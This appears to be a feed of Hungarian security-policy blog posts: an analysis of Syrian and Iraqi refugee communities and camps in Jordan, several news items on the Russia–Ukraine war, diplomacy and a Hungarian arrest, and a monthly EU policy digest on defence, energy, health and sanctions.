Biztonságpolitika

Csaknem 10 évvel ezelőtt hatalmas menekülthullám áramlott Jordániába és a környező országokba. Ennek oka az arab tavasz nyomán kitörő polgárháborúk Irakban és Szíriában, illetve az Iszlám Állam nevű terrorszervezet megjelenése a térségben. A Jordán Hásimita Királyságnak és az ide menekülő szíriai és iraki állampolgároknak számtalan problémával kell és kellett szembenézniük: integráció az új társadalomba, menekülttáborok létrehozása, a menekültek elhelyezése és egy új esély biztosítása számukra. Mára Jordánia az az ország, amely lakosságához viszonyítva a legtöbb menekültet fogadja: 1000 lakosra összesen 89 fő menekült jut. Habár az ország kapcsán legtöbbször a palesztin menekültek helyzete merül fel, elemzésemben a kevésbé taglalt, szíriai és iraki menekültközösségek helyzetét, kapcsolatát és a menekülttáboraikat szeretném bemutatni.

A Jordán Hásimita Királyságról röviden

Jordán Hásimita Királyság egy Közel-Keleten található „demokratikus alapokon működő alkotmányos monarchia”[1]. Az ország tulajdonképpen egy mesterséges képződmény, hiszen az észak- jordániai lakosok hagyományosan Szíriához, a dél-jordániaiak pedig az Arab-félszigethez kötődtek, a nyugat-jordániaiak pedig a ciszjordániai palesztinokkal azonosultak. A területe az évszázadok során különböző birodalmak részét képzete és ütközőzónaként szolgált az arab törzsek számára. 1921-ben, brit mandátum alatt jött létre a Transzjordánia Emirátus, majd 1946. május 25-én független királysággá vált. Ekkor egyesült Kelet-és Ciszjordánia is, és jelentős számú palesztin menekült jordániai állampolgárságot kapott. A területet 1967-ben megszállta Izrael, amelynek következtében a palesztin csapatok is felléptek a régió elnyerése érdekében. Ennek eredményeként Jordánia 1988-ban lemondott Csiszjordániáról és megszakított mindennemű kapcsolatot.[2]

A Westminster Foundation for Democracy szerint az ország azonban jelenleg csak formálisan alkotmányos monarchia. Az Alapítvány megjegyzi, hogy bár előrelépés történt a parlamenti demokrácia és a fokozott decentralizáció irányába, még mindig esedékes a „parlamenti gyakorlat korszerűsítése, a pluralizmus előmozdítása, valamint a választott képviselők és a lakosság szélesebb köre közötti párbeszéd elősegítése”. Az állítást más források is előtámasztják: a Freedom House szerint királynak domináns szerepe van a politika és a közigazgatás irányításában, továbbá parlament alsóházát választják, de a választási eljárás szándékosan hátrányos helyzetbe hozza az ellenzéket, és a kamara csekély valódi hatalommal rendelkezik. A kormány nyomása és a korlátozó szabályozások megnehezítik a média és a civil társadalmi szervezetek működését. Az igazságszolgáltatási rendszer nem független, és gyakran nem tartja tiszteletben a tisztességes eljáráshoz való jogot.

Megfigyelhető, hogy többször is megkérdőjeleződött a demokrácia érvényesülése az országban az évek során. A szegénység és a megélhetési költségek növekedése miatt a polgárok és az állam közötti bizalom már számtalanszor megingott, illetve a lakosság részvétele a döntéshozatalban korlátozott, különösen a marginalizált csoportok, például a nők, a fiatalok és a fogyatékkal élők körében. A Freedom House által a politikai jogokról és a polgári szabadságjogokról világszerte készített éves tanulmány szerint Jordánia nem tekinthető szabad országnak sem. A Freedom on the Net tanulmányuk alapján pedig az internet szabadsága Jordániában továbbra is korlátozott: „az internethez való hozzáférés az elmúlt években jelentősen javult, bár továbbra is fennállnak az online tevékenység állami felügyeletével kapcsolatos aggodalmak”.

Az iraki és szíriai menekült közösségek helyzete

A lakosság száma a menekült hullámoknak köszönhetően növekedett meg a 20. században, legtöbb menekült Palesztinából és Irakból érkezett. Szám szerint 2,6 millió (regisztrált) palesztin menekült, 1 millió iraki menekült és 1,6 millió szíriai menekült tartózkodik Jordániában, továbbá a külföldi munkavállalók számával együtt, a nem jordániai állampolgárok száma meghaladja az 5 millió főt, amely csaknem a lakosság felét jelenti.[3] A soknemzetiségű társadalomnak és mai napig nagy jelentőségű törzsi tagolódásnak köszönhetően az országban a szociális biztonsági faktorokon több törés is fellelhető.

Az ENSZ Menekültügyi Főbiztossága (UNHCR) szerint Jordánia az az ország, amely lakosságához viszonyítva a legtöbb menekültet fogadja, 1000 lakosra összesen 89 fő menekült jut. Összességében az ország több, mint 1,3 millió szíriai állampolgárnak ad otthont. 2023. februári adatok szerint az aktívan regisztrált érintettek száma 661,854 fő, ebből 20% (135,028 fő) él menekülttáborokban, és 80 százalékuk (526,826 fő) pedig a táborokon kívül. 2022-es adatok szerint az iraki aktív, nyilvántartott, érintett személyek száma 66 029 fő, kevesebb, mint a szíriaiaké. Így összesen 727 883 szíriai és iraki menekültet és menedékkérőt tart nyilván az UNHCR Jordániában.

Fontos megjegyezni, hogy a két menekült közösség megítélése között általában óriási különbségek vannak. Az iraki menekültek a két állam közötti történelmi kapcsolatok miatt jobb helyzetben vannak a jordániai társadalomban, így az országot „mindig is politikai menedékhelynek tekintették az iraki állampolgárok”. Tekintettel arra, hogy az iraki menekültek többsége városi területekről származik, Jordánia városai kézenfekvő menedékhelyeket kínálnak az irakiak számára. Leginkább Amman, Zarqa és Ibrid városába érkeznek, különösen a közlekedési és szolgáltatási infrastruktúra miatt. Ráadásul a jordán-iraki határ mentén nincsenek igazi határvárosok (mint például a szíriai és a jordániai határ mentén). Az iraki menekültek az ország stabilitása miatt biztonságosnak írják le a Jordániában való életet.

Ami a szíriai menekültek helyzetét illeti, a jordániai állampolgárok úgy vélik, hogy ez a réteg kevésbé képzett és szegényebb, mivel a szíriaiak többsége vidéki területekről származik Dél-Szíriából. A több ezer szíriait, akik átlépik a határt, általában nem fogadják be a jordániai nagyvárosok, így a legtöbbjüket a 2012. júliusában létrehozott, az UNHCR és a jordániai kormány által közösen irányított zaatari táborban és az 2014-ben létrehozott azraqi táborban helyezik el. A zaatari tábor az egyik legnagyobb szíriaiakat befogadó menekülttábor, a menekültek száma 82 268 fő. Mafraqtól (egy észak-jordániai várostól) 10 km-re keletre található. Az Azraq táborban 39 322 menekültet helyeztek el, amely Északkelet-Jordániában található.

Ezek az eredmények azt mutatják, hogy a szíriai menekülteknek több kihívással kell szembenézniük, mivel nem rendelkeznek ugyanazokkal az előnyökkel, mint az iraki nemzetiségűek. Általánosságban elmondható, hogy az iraki menekültek nagyon gyorsan és könnyen be tudnak illeszkedni a társadalomba, mivel a városi területeken és a városokban szívesen látják őket, így csak az alapvető szociális biztonsági problémáktól szenvedhetnek, de a szíriai menekültek kiszolgáltatottabbak a társadalmi elutasítás és a vidéki területeken, valamint a menekülttáborokban uralkodó életkörülmények miatt. Az ENSZ Menekültügyi Főbiztosságának adatportálja is alátámasztja ezt az állítást, a „Registered Persons of Concern Refugees and Asylum Seekers in Jordan” adatlap szerint a szíriai menekültek és menedékkérők 62,3%-a a nagyvárosi régión kívül él, az iraki menekültek és menedékkérők 88%-a azonban a fővárosi régióban.

A menekülttáborban vagy azon kívül?

A szíriai és iraki menekültek számára fenntartott két fő jordániai tábor a már említett zaatari és azraqi tábor. A zaatari menekülttábor 11 éve nyitotta meg kapuit, kezdetben 80 000 fő szíriai állampolgárt helyeztek el itt. A 12 körzetre osztott tábor a csúcspontján mintegy 200 000 szíriai menekültnek adott otthont, ezzel Jordánia negyedik legnagyobb városává vált. Az évek során sok menekült visszatért Szíriába vagy más országokba költözött, a táborban még mindig mintegy 80 000 ember él, akiknek több mint fele (55%) gyermek.  A tábor 58 közösségi központtal, 32 iskolával és nyolc orvosi rendelővel rendelkezik.

Az azraqi menekülttábort 2014-ben nyitották meg azzal a célzattal, hogy csökkentse a zaatari tábor túlzsúfoltságát. Jelenleg 40 000 fő menekültnek ad otthont, irányítását a Szíriai Menekültügyi Igazgatóság (SRAD) és az ENSZ Menekültügyi Főbiztossága koordinálja. A menekülttábort szintén falualapú megközelítéssel hozták létre, hogy a lakosok körében erősítsék a felelősségvállalás és a közösség érzését. Az Azraq táborban jelenleg négy egészségügyi alapellátási központ, 15 iskola és 388 hivatalos üzlet működik, amelyek a menekültek és a befogadó közösség tagjainak tulajdonában van. A magas szintű biztonság és a távoli elhelyezkedés miatt az azraqi tábort általában a „kevésbé vonzó” tábornak tekintik. Sőt, Azraq soha nem érte el a 120 000 fős maximális befogadóképességének a felét sem, mivel a menekültek többsége úgy döntött, hogy táboron kívül jobb helyzetben élhet. Továbbá, a táborokban a nők és lányok elleni nemi erőszak miatt dönt úgy sok család, hogy lehetőség szerint elkerüli az ide való költözést.

Zaatar-ban és Azraq-ban különböző módon juthatnak a menekültek jövedelemhez. A jövedelemszerzési lehetőségek lehetséges formái közé tartozik például az ösztönző alapú Önkéntességi rendszer (Az IBV aktív szerepet játszik abban, hogy a menekültek lehetőségük legyen kiegészítő jövedelemhez jutni) és a magánvállalkozások működtetése a helyi piacon, amely által a menekültek különböző vállalkozásokat is működtethetnek; például fodrászüzleteket, ruházati boltokat, illetve ételstandokat. Minden menekült havi 23 jordániai Dinár (32 dollár) értékű élelmiszer-utalványt kap a Világélelmezési Programtól (WFP), továbbá a WFP az iskolai étkeztetési program keretein belül napi étkeztetést biztosít a két táborban működő iskolák tanulói számára. Azonban ezek a támogatások már nem elégítik ki az alapvető szükségleteket a növekvő élelmiszeráraknak köszönhetően. Külső válságok sorozata gazdasági válságot és inflációt idézett elő Jordániában (a szíriai konfliktus gazdasági következménye, COVID-19 világjárvány, orosz-ukrán háború) ennek következményeképpen pedig a szíriai és iraki menekültek rendkívül nehéz helyzetbe kerültek az országban. Az ENSZ Menekültügyi Főbiztossága szerint a zaatari táborban élő menekült családok nagy része eladósodott, és 92 százalékuk arról számolt be, hogy emiatt kénytelek az élelmiszerfogyasztás csökkentéséhez vagy illegális munkák vállalásához folyamodni. A jordániai menekülttáborokban már az ukrajnai háború kitörése előtt is nőtt az élelmiszerellátás bizonytalansága: a táborokban a menekült háztartások több mint fele (58%) élelmezési gondokkal küzd, míg két évvel ezelőtt ez az arány csak 39,5% volt. Továbbá a szigorú be- és kilépési feltételek miatt a táborok lakói nagyrészt el vannak zárva a külső munkaerőpiacoktól és élelmiszervásárlási lehetőségek széles skálájától, így rendkívül érzékenyen reagálnak a táboron belüli élelmiszerár-emelkedésekre.

Viszont úgy tűnik, hogy a Zaatar-on és Azraq-on kívül jelenleg nehezebb a megélhetés a menekültek számára. A táborokban uralkodó nehéz helyzet és szigorú szabályok ellenére a menekültek egy része úgy döntött, hogy visszaköltözik a menekülttáborokba (munkanélküliség, valamint az emelkedő üzemanyag- és áramárak miatt), amelyeket korábban elutasítottak. Zaatar-ban és Azraq-ban (az Azraq tábor az első megújuló energiával működő menekülttábor a világon) napenergiával biztosítanak áramot a lakók számára, illetve menedékházakban helyezik el a menekülteket, így az itt élők megélhetési költségei alacsonyabbak. Továbbá, úgy tűnik, hogy a jordániai kormány is a menekülttáborokba való visszatérésre ösztönzi az egykori lakókat, hiszen így csökkenhetnek az anyagi nehézségeik. Azonban a növekvő lakók száma egyre nagyobb terhet ró az ENSZ Menekültügyi Főbiztosságára, hiszen már így is túlzsúfoltak a táborok, ahol szükség lenne a szolgáltatások bővítésére és korszerűsítésére.

Tekintettel a jelenlegi világgazdasági helyzetre és a növekő inflációra Jordániában az ideális megoldás a táborok fejlesztése és kapacitásának kibővítése lenne, így a visszatérő és már bent élő menekültközösségek kevésbe szenvedik el a válság következményeit. Ahogy említettem, a menekülttáborokban is rendkívüli nehézségekkel néznek szembe a lakók, azonban a kialakított szociális hálónak köszönhetően biztosabb megélhetés vár az itt élőkre.

[Az Innovációs és Technológiai Minisztérium ÚNKP-22-2-II-NKE-61 kódszámú Új Nemzeti Kiválóság Programjának a Nemzeti Kutatási, Fejlesztési és Innovációs Alapból finanszírozott szakmai támogatásával készült.]

Hasonló témájú cikkeink ide kattintva olvashatók.

Photo by Mohammad Almashni on Unsplash

[1]George, Alan. Jordan: Living in the Crossfire. London: Zed Books Ltd, 2005.

[2]George, Alan. Jordan: Living in the Crossfire. London: Zed Books Ltd, 2005.

[3]7Singh, Mnajari. األزمة إدارة إلى األزمة ضبط من :19-كوفيد بعد األردن) Jordan after COVID-19: From Crisis Adjustment to Crisis). Washington: Washington Institue for Near East Policy, 2020/04/15.

A Egy évtized küzdelem: A szíriai és iraki menekültek helyzete a Jordán Hásimita Királyságban bejegyzés először Biztonságpolitika-én jelent meg.

A közlemény szerint tíz katona és két civil került vissza ukrán területre. A civilek közül egy Harkiv megyéből, egy pedig a Donyeck megyei Mariupolból származik. A parancsnokság arra nem tért ki, hogy cserébe az ukrán fél adott-e át orosz foglyokat. Az Ukrajinszka Pravda hírportál emlékeztetett arra, hogy március 24-én Ukrajna egyoldalúan és feltétel nélkül visszaadta Oroszországnak mind az öt súlyosan megsebesült orosz foglyot, akik szállítható állapotban voltak.

Olekszandr Szirszkij, az ukrán szárazföldi erők parancsnoka közölte, hogy találkozott a Donyeck megyei Bahmut városát védő ukrán katonákkal, és cáfolta a város bevételéről közzétett orosz állításokat. Szavai szerint folyamatos kapcsolatban van azokkal az ukrán alakulatokkal, amelyek a front legkritikusabb részein teljesítenek szolgálatot. „Találkoztam azokkal a katonákkal és parancsnokokkal, akik lerombolták a Wagner-zsoldosok és az orosz ejtőernyősök legyőzhetetlenségéről szóló mítoszt” – jelentette ki, ugyanakkor nem pontosította, hogy legutóbb mikor találkozott Bahmut védőivel.

„Az ellenség gyengül, ezért újabb és újabb hamisítványokkal próbálja leplezni a Bahmut elfoglalására irányuló erőfeszítéseinek kudarcait” – tette hozzá. Szirszkij legutóbb március 27-én hozta nyilvánosságra, hogy látogatást tett a Bahmutot védő ukrán alakulatoknál. A szárazföldi erők parancsnokát megelőzően Szerhij Cserevatij, az ukrán keleti erők szóvivője, és Andrij Jermak, az ukrán elnöki iroda vezetője cáfolta, hogy a Wagner orosz zsoldoscsoport elfoglalta volna a bahmuti városházát, ahogy azt Jevgenyij Prigozsin, a Wagner-csoport alapítója egy videóüzenetben bejelentette.

„Semmit sem foglaltak el, és enyhén szólva messze vannak attól, hogy bármit is elfoglaljanak a városban” – jelentette ki a szóvivő egy sajtónyilatkozatában. Hozzátette: harcok folynak a városháza épülete körül, de „jogi értelemben az orosz erők nem foglaltak el semmit”.

Az ukrán vezérkar esti helyzetjelentésében arról számolt be, hogy erőik hétfőn több mint 45 orosz támadást vertek vissza, a harci cselekmények epicentrumában továbbra is a donyecki régió három települése, Bahmut, Avgyijivka és Marjinka van. A jelentés szerint az ukrán légierő a nap folyamán öt csapást mért orosz élőerő- és fegyverzetgócpontokra, valamint megsemmisítettek egy orosz drónt. A rakéta- és tüzérségi egységek egy orosz csapatösszpontosulásra mértek csapást. Eközben az orosz erők három rakéta- és 17 légicsapást intéztek, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel az ukrán csapatok állásai, és a települések polgári infrastruktúrája ellen – írta az ukrán vezérkar.

Volodimir Zelenszkij, ukrán elnök az Ukrinform hírügynökség szerint kijelentette, hogy az ukrán hadsereg nagyszabású ellentámadást fog végrehajtani, és Ukrajna minden ideiglenesen megszállt területét visszafoglalják. Részleteket nem árult el, azt sem, mikor indul az ellentámadás – mint mondta – azért, hogy Oroszország ne tudjon felkészülni rá. „Az orosz csapatoknak még van idejük elhagyni Ukrajnát, különben megsemmisítjük őket” – szögezte le Zelenszkij. Az ukrán vezérkar hétfői helyzetjelentésében közölte, hogy mostanra az orosz hadsereg Ukrajnában elszenvedett embervesztesége meghaladta a 175 ezret.

The post Orosz agresszió: újabb ukrán foglyok térhettek haza appeared first on .

A moszkvai tájékoztatás szerint az üggyel kapcsolatban Lavrov felhívta Blinken figyelmét arra, hogy tiszteletben kell tartani az orosz hatóságok lépéseit, amelyeket a jogrenddel és Oroszország nemzetközi kötelezettségeivel összhangban tettek meg. Az orosz tárcavezető megengedhetetlennek nevezte azt, ahogy washingtoni tisztségviselők és a nyugati média felháborodást keltenek „azzal a nyilvánvaló szándékkal, hogy politikai színezetet adjanak az ügynek”.

„Lavrov kiemelte, hogy Evan Gershkovich-ot tetten érték, amikor újságírói státuszának álcája alatt próbált meg államtitoknak minősülő adatokhoz jutni” – állt a közleményben. Az orosz fél közölte, hogy a törvénybe ütköző tevékenységet folytató amerikai állampolgár őrizetbe vételéről az Egyesült Államok moszkvai nagykövetségét az előírásoknak megfelelően értesítették, Gershkovich sorsáról pedig bíróság fog dönteni.

Az orosz külügyminisztérium szerint Lavrov és Blinken néhány kétoldalú kérdést is megvitatott.

The post A kémkedéssel gyanúsított újságíróról tárgyalt az orosz és az amerikai külügyminiszter appeared first on .

„Ha ez meg is történne, az Csehország lakossága számára semmiféle veszélyt nem jelentene” – mondta a tárcavezető kérdésre válaszolva.

Moszkva azon bejelentésére reagálva, hogy Oroszország taktikai atomfegyvereket telepít a szomszédos Fehéroroszországba, Cernochová leszögezte: Csehország semmi esetre sem számol azzal, hogy területére atomfegyvereket telepíthetnének. „Semmi ilyesmi nincs napirenden” – hangsúlyozta a védelmi miniszter.

Cernochová szerint a NATO júliusi vilniusi csúcstalálkozóján várhatóan döntés születik a szervezet keleti szárnyának további megerősítéséről. A miniszter úgy vélte, hogy erre az orosz bejelentés nélkül is sor került volna. „Az Ukrajnában lejátszódó eseményeket nem lehet figyelmen kívül hagyni” – mutatott rá Cernochová.

Lubomír Metnar korábbi védelmi miniszter, Cernochová beszélgetőpartnere szintén úgy fogalmazott, hogy „az orosz bejelentésre mindenképpen reagálni kell”.

Cernochová szerint nem valószínű, hogy az orosz-ukrán konfliktus gyorsan befejeződne, másfelől folyamatos erőfeszítéséket kell tenni a problémák diplomáciai megoldása érdekében. „Mindegy, hogy ki fog közvetíteni, akár a Nyugat, akár egy Oroszországhoz közeli ország” – jegyezte meg a miniszter. Hozzátette, Kínát sem lehet kizárni.

The post A cseh lakosság számára állítólag nem jelentene fenyegetést az atomfegyverek bevetése Ukrajnában appeared first on .

A Miskolci Törvényszék közleménye szerint a fiatal az üzenetváltások során kilátásba helyezte az általa méltatott lövöldözésekhez hasonló cselekmény végrehajtását. A nyomozás jelenlegi állása szerint a fiatalkorú gyanúsított cselekménye emberölés előkészülete bűntettének megállapítására alkalmas.

A bíróság álláspontja szerint megalapozottan feltehető, hogy a gyanúsított a bizonyítást veszélyeztetné tárgyi bizonyítási eszköz, elektronikus adat megsemmisítésével, elrejtésével, esetleg szabadlábon lévő társaival összebeszélne, őket az eljárásról tájékoztatná. Fennáll annak a veszélye is, hogy a cselekményt folytatná vagy az előkészített bűncselekményt véghez vinné – írták.

A közlemény szerint mindezekre, valamint a bűncselekmény kiemelkedő társadalomra veszélyességére tekintettel a bíróság vasárnap egy hónapra elrendelte a fiatal letartóztatását, amelyet javítóintézetben kell végrehajtani. A végzés nem végleges — közölte a Miskolci Törvényszék.

The post Letartóztatásban egy fiatalkorú emberölés előkészületének gyanúja miatt appeared first on .

Ez a Biztonságpolitikai Szakkollégium EU hírfigyelője, amely havi rendszerességgel jelenik meg. Az összeállításban az Európai Unió egyes szakpolitikáinak legfrissebb fejleményeibe nyújtanak betekintést a szerzők.

Közös biztonság- és védelempolitika

Az Európai Unió a közös biztonság- és védelempolitika keretében február 20-án elindította az EU örményországi polgári misszióját (EUMA). Az EUMA egy semleges és nem végrehajtó misszió, amely kétéves mandátummal rendelkezik majd. A missziót az örmény-azerbajdzsáni határ örmény oldalán fogják telepíteni, és célja az örmény határ menti területek stabilitásához, bizalomépítéshez és az emberi biztonság megteremtéséhez való hozzájárulás, valamint olyan környezet biztosításához, amely elősegíti az Örményország és Azerbajdzsán közötti, az EU által támogatott normalizációs erőfeszítéseket.

Az Európai Unió, a NATO és Ukrajna február 21-én tartotta első háromoldalú találkozóját. Josep Borrell uniós kül- és biztonságpolitikai főképviselő, Jens Stoltenberg NATO főtitkár és Dmytro Kuleba ukrán külügyminiszter által képviselt felek megvitatták a fegyver- és lőszerbeszerzési rendszer javításának lehetőségeit, hogy továbbra is támogassák Ukrajnát. Mind az EU, mind a NATO hangsúlyozta, hogy támogatja Ukrajna önvédelemhez való jogát, amelyet az ENSZ Alapokmánya is rögzít.

(Készítette: Mészáros Kinga)

Energia- és klímapolitika

Az Európai Unió – a nemzetközi G7+ csoporttal együtt – további ársapka-intézkedést fogadott el a tengeri szállítású orosz kőolajtermékekre. A kőolajtermékekre vonatkozó ársapka 2023. február 5-től lépett életbe. A kőolajtermékekre és a nyersolajra vonatkozó ársapkákat folyamatosan figyelemmel kísérik, hogy biztosítsák hatékonyságukat és hatásukat. Az orosz kőolajtermékekre két árszintet határoztak meg: az egyiket a „prémium nyersolajhoz” tartozó kőolajtermékekre, mint például a dízel, a kerozin és a benzin, a másikat pedig a „diszkont nyersolajhoz” tartozó kőolajtermékekre, mint például a fűtőolaj.

A Bizottság 2023. február 13-án részletes szabályokat javasolt annak meghatározására, hogy mi számít megújuló hidrogénnek az EU-ban. Ez szabályozási biztonságot nyújt a befektetők számára, mivel az EU célja, hogy a REPowerEU-tervvel összhangban elérje a 10 millió tonna hazai megújuló hidrogéntermelés és a 10 millió tonna importált megújuló hidrogén mennyiségét.

Az Európai Bizottság 2023. február 14-én új CO2-kibocsátási célértékeket javasolt az új nehézgépjárművekre vonatkozóan 2030-tól kezdődően. Ezek a célkitűzések hozzájárulnak a közlekedési ágazat CO2-kibocsátásának csökkentéséhez – a tehergépkocsik, a városi és távolsági buszok az EU teljes üvegházhatásúgáz-kibocsátásának több mint 6%-áért és a közúti közlekedésből származó üvegházhatású gázok kibocsátásának több mint 25%-áért felelősek. Ezek a szigorított kibocsátási előírások biztosítanák, hogy a közúti közlekedési ágazatnak ez a szegmense hozzájáruljon a kibocsátásmentes mobilitásra való áttéréshez, valamint az EU éghajlatvédelmi és környezetszennyezés-mentességi célkitűzéseihez.

(Készítette: Mészáros Kinga)

[Az Innovációs és Technológiai Minisztérium ÚNKP-22-2-II-NKE-74 kódszámú Új Nemzeti Kiválóság Programjának a Nemzeti Kutatási, Fejlesztési és Innovációs Alapból finanszírozott szakmai támogatásával készült.]

Környezetpolitika

2023 februárjában az Ukrajnába látogató Bizottság tagok, az ukrán kormánnyal egyeztettek az ország segítésével kapcsolatban. Az Európai Unió a NEB-bel (New European Bauhaus) együtt támogatja a városok fenntartható, energiahatékony és klíma semleges úton történő újjáépítését. A fejlesztési projektet a Horizont Európa és a LIFE program finanszírozási segítségével fogják megvalósítani.

2023 február 9-én Brüsszelben, az Észt Állandó Képviseleten kerekasztal-beszélgetést tartottak a Zöld Városok és egyéb szervezetek vezetői, hogy eszmecserét tartsanak arról, hogyan tehetnék a városokat jobbá tenni a lakosság és a környezet figyelembevételével. Észtország fővárosa, ami nemrégiben vált Európa 2023. évi Zöld Fővárosává, négy szóval jellemezné ezen évre szóló terveit. Ezek a biodiverzitás, innováció, éghajlat és a fenntartható kormányzás.

(Készítette: Vida Fanni)

Egészségügy

2023. február 7-én Moldova csatlakozott az Unión belüli EU4Health társulásához. Ennek köszönhetően ez az ország is hozzáférhet majd az egészségügy területén megjelenő uniós támogatásokhoz. Ez hozzájárul az egészségügyi rendszer fejlesztéséhez és például a COVID járvány utáni helyreállítási folyamatokhoz is.

A hónapban a Bizottság intézkedéseket javasolt a veszélyes vegyi anyagokkal dolgozók egészségének megőrzése érdekében. Új expozíciós határértékeket vezetnének be, amelyekkel például az ólom és diizocianátok negatív hatásait minimalizálni tudják. Két irányelv módosítása került előtérbe, melyek a rákkeltő, mutagén anyagokkal kapcsolatos kockázatoknak kitett munkavállalók és a munkájuk során vegyi anyagokkal kapcsolatos kockázatoknak kitett munkavállalók alkalmazását szabályozzák.

Az előző hónapban már említett recEU, mintegy 545,6 millió eurós készleteihez csatlakozott februárban Horvátország, Franciaország, Lengyelország és Finnország. Ez a pénzügyi alap a HERA együttműködésével a vegyi, biológiai és radiológiai veszélyekre való felkészülés és reagálás céljából biztosít támogatást. A készlet az uniós egészségügyi és polgári védelem között hoz létre együttműködést. A Bizottság emellett pályázati felhívást tett közzé, mely a világjárványt okozó kórokozókra való reagálásra összpontosít.

(Készítette: Vida Fanni)

Szankcióspolitika

2023. február 4-én az Európai Unió tagállamai megállapodtak az orosz kőolajtermékekre vonatkozó árplafon mértékéről. A Tanács úgy határozott, hogy két árplafont állapít meg az Oroszországból származó vagy onnan exportált, 2710 KN-kód alá tartozó kőolajtermékekre vonatkozóan. Emellett a Tanács kinyilvánította igényét arra, hogy március közepétől ismét felülvizsgálja a nyersolajra vonatkozó árplafon-mechanizmust, és a felülvizsgálatra rendszeresen, kéthavonta kerüljön sor.

A vonatkozó árplafon 2023. február 5-től alkalmazandó szintjét az árplafon-koalícióval szoros együttműködésben állapították meg úgy, hogy a nyersolajhoz képest kedvezményes áron forgalmazott termékek árát 45 dollárban, míg a nyersolajhoz képest felárral forgalmazott termékek árát hordónként 100 dollárban állapították meg.

Ezek azok a hordónkénti árak, amelyeken vagy amelyek alatt az Oroszországból származó kőolajtermékek mentesülnek a szállítási tilalom alól:

• kőolajtermékek tengeri szállítása harmadik országokba és
• a kőolajtermékek harmadik országokba irányuló tengeri szállításával kapcsolatos technikai segítségnyújtás, közvetítői szolgáltatások vagy finanszírozás vagy pénzügyi támogatás.

Február 20-án arról született döntés, hogy az EU 2024. február 24-ig meghosszabbítja Ukrajna egyes, nem kormányzati ellenőrzés alatt álló Donyeck, Luhanszk, Zaporizzsja és Herszon területekre irányuló, a velük való gazdasági és egyéb kapcsolatokat az Oroszországi Föderáció általi jogellenes elismerése, megszállása és annektálása miatt korlátozó intézkedésekről szóló (KKBP) 2022/266 határozatot.  Amelynek jegyében a területeket érintő korlátozó intézkedések a következők:

• a területről származó áruk behozatalának tilalma
• bizonyos áruk és technológiák kiviteli tilalma
• egyes tanácsadási és konzultációs szolgáltatások tilalma.

Az említett határozat tehát módosította a (KKBP) 2022/266 határozat címét, és kibővítette a korlátozások földrajzi hatályát, hogy az kiterjedjen Ukrajna valamennyi, nem kormányzati ellenőrzés alatt álló területére. Ennek értelmében az Unió továbbra is töretlenül támogatja Ukrajnának a nemzetközileg elismert határain belüli szuverenitását és területi integritását, és változatlanul kitart az Oroszország általi illegális annektálás el nem ismerése politikájának teljeskörű végrehajtása mellett. Az Unió nem ismeri el és továbbra is elítéli az ukrán területek Oroszországi Föderáció általi jogellenes annektálását, mint a nemzetközi jog megsértését.

Február 25-én, az orosz-ukrán háború egyéves évfordulója után egy nappal elfogadásra került az EU tizedik szankcióscsomagja az Oroszországi Föderáció Ukrajna ellen irányuló agressziójára válaszul. A szankciók szükségessége kapcsán Josep Borell, az Európai Unió biztonság-, és védelempolitikai főképviselője a következőképpen nyilatkozott: „Putyin fokozza ezt az illegális agressziót, fegyverként használva a telet, az élelmet és az éhezést. Oroszország továbbra is megmutatja embertelen arcát a civil célpontok elleni brutális rakétaterrorral. A mai 10. szankciócsomag azokat veszi célba, akik közreműködnek e brutális háború folytatásában. További intézkedéseket hozunk, amelyek a bankszektor, a kettős felhasználású technológiákhoz való hozzáférés és a fejlett technológiák ellen irányulnak. Tovább növeljük az Oroszországra gyakorolt nyomást – és ezt addig fogjuk tenni, amíg szükséges, amíg Ukrajna fel nem szabadul a brutális orosz agresszió alól.”

A fent leírtak jegyében foganatosított csomag a következőkre vonatkozó tilalmakat tartalmazza:

– kritikus technológia és ipari termékek exportja

– aszfalt és szintetikus gumi behozatala

– gáztárolási kapacitás biztosítása oroszoknak

– az EU-ból exportált kettős felhasználású termékek és technológia tranzitja Oroszországon keresztül.

Emellett az Unió egyrészt felfüggesztette az RT Arabic és a Sputnik Arabic műsorszórási engedélyeit. Másrészt korlátozta az orosz állampolgárok lehetőségét arra, hogy az EU kritikus infrastruktúráinak és szerveinek vezető testületeiben bármilyen tisztséget betöltsenek. Harmadsorban fontos megemlíteni, hogy új jelentéstételi kötelezettségeket vezetett be a vagyonbefagyasztási tilalmak hatékonyságának biztosítása érdekében és további szankciókat vezetett be 87 személy és 34 szervezet ellen, köztük kulcsfontosságú döntéshozók, katonai vezetők, a Wagner-csoport katonai parancsnokai és a szankciók bevezetése során elsőként iráni dróngyártók ellen. Végül a kettős felhasználású áruk szintén a korlátozások fókuszpontjává váltak: a határozat további 96 szervezettel bővíti az Oroszország katonai és ipari komplexumát az agressziós háborúban közvetlenül támogató szervezetek listáját, és ezáltal szigorúbb exportkorlátozásokat vezet be velük szemben. Az orosz védelmi és biztonsági ágazat technológiai fejlesztéséhez hozzájáruló, korlátozás alá eső termékek listájára mostantól további új elektronikus alkatrészek kerülnek fel, amelyeket a harctéren előkerülő orosz fegyverrendszerekben használnak, beleértve a drónokat, rakétákat, helikoptereket, valamint bizonyos ritkaföldfémeket, elektronikus integrált áramköröket és hőkamerákat.

(Készítette: Haiszky Edina Julianna)

Szomszédságpolitika

Keleti szomszédságpolitika

A keleti szomszédság tekintetében, ismét Ukrajna megsegítése és integrálása az európai közösségbe állt februárban a szakpolitika középpontjában. Február 2-án az EU újabb 450 millió eurós támogatási csomagot jelentett be Ukrajnának 2023-ra, amivel az EU, a tagállamok és az európai pénzügyi intézmények által a háború kezdete óta nyújtott támogatás összege mintegy 50 milliárd euróra emelkedett. Emellett az Európai Bizottság 1 milliárd eurós hozzájáruláson dolgozik a gyors helyreállításhoz. Az új, 450 millió eurós támogatási csomag 145 millió eurót tartalmaz humanitárius segítségnyújtásra és 305 millió eurót kétoldalú együttműködésre az infrastruktúra gyors helyreállítása, Ukrajna ellenálló képességének növelése és a reformfolyamat támogatása érdekében.

